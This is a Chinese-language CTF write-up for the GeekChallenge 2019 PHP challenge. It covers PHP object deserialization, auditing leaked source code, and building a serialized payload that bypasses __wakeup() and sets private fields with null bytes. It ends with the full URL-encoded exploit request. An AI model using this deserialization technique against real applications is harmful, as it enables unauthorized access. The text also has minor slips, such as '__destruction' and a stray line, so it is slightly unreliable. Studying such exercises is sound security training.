[极客⼤挑战2019]PHPCTF题解与分析
知识点
php序列化与反序列化
序列化:函数为serialize(),把复杂的数据类型压缩到⼀个字符串中数据类型可以是数组,字符串,对象等
反序列化:函数为unserialize(),将字符串转换成变量或对象的过程
常⽤的魔术⽅法:
__construct():创建对象时初始化,当⼀个对象创建时被调⽤
__wakeup() 使⽤unserialize时触发
__sleep() 使⽤serialize时触发
__destruction():结束时销毁对象,当⼀个对象销毁时被调⽤
private
private 声明的字段为私有字段,只在所声明的类中可见,在该类的⼦类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前⾯都会加上\0的前缀。字符串长度也包括所加前缀的长度
__wakeup()绕过
在反序列化字符串时,属性个数的值⼤于实际属性个数时,会跳过 __wakeup()函数的执⾏
解题思路与过程
1.⽬录扫描
访问题⽬连接根据提⽰猜测可能存在信息泄露,我们扫描⽬录发现备份⽂件:www.zip,发现备份⽂件为源代码
2.代码审计
在index.php中到php代码
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
>
这⾥包含了class.php⽂件,⽤GET⽅法传⼊参数select的值,然后反序列化该值,猜测此题与反序列化漏洞有关
接着审class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NOhacker</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
>
如果password=100,username=admin,在调⽤__destruct()时就可以获得flag,因此我们需要构造⼀个序列化使得password=100,username=admin
<?php
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
php文件下载源码
$a = new Name('admin', 100);
$b = serialize($a);
echo $b;
>
得到序列化后的结合
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
3.绕过__wakeup()
__wakeup()⽅法中$this->username = 'guest'会让username重新赋值。在反序列化字符串时,属性个数的值⼤于实际属性个数时,会跳过 __wakeup()函数的执⾏,我们可以将字符串中O:4:"Name"后⾯的2改为3及以上的整数
O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
注意该类中使⽤的private来声明字段,private在序列化中类名和字段名前都要加上ASCII 码为 0 的字符(不可见字符),如果我们直接复制结果,该空⽩字符会丢失,需要我们⾃⼰加上
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
将该字符串作为select参数的值,GET⽅式发送过去就可以获得flag
题⽬链接/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。